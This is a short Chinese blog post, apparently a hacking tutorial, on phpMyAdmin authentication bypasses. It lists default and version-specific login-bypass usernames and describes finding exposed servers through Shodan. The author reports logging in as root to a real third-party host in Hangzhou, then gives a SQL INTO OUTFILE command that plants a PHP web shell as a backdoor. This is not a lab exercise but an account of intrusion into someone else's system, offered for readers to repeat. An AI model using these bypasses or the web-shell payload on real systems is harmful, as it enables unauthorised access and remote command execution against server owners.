phpMyAdmin 通用密碼漏洞

  • 默認 phpMyAdmin:用戶名 root、密碼 root 或空登陸。

  • 版本 2.11.3~2.11.4:用戶名 'localhost'@'@" 登陸,無需密碼。

  • 版本 2.11.9.2:用戶名 root 登陸,無需密碼。

經測試,第二個漏洞在 phpMyAdmin 3.5.1 版本也是可行的。原理從略。

下面讓我們簡單的上網看看能不能找到一些存在這樣漏洞的登陸頁面。

祭出著名的漏洞搜索引擎 Shodan 並搜索 phpMyAdmin。

phpMyAdmin

在這裏插入圖片描述

先看看有沒有不需要密碼登陸的,逐一嘗試沒有後尋找名字中包含的版本號。這裏我找到一個國內的(浙江省·杭州市)。

在這裏插入圖片描述

地址已手動打碼。

http://121.***.*.219:80/

在這裏插入圖片描述

登陸成功(root 權限)。

在這裏插入圖片描述

接下來你可以寫一個 outfile 到對方主機的網絡目錄下。俗稱 “留後門”。

SELECT "<?php system($_GET[‘cmd’]); ?>" into outfile "後門文件的絕對路徑"

在這裏插入圖片描述

點擊運行,不出意外便在對方主機留下了一個名爲 runme.php 的後門文件。

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章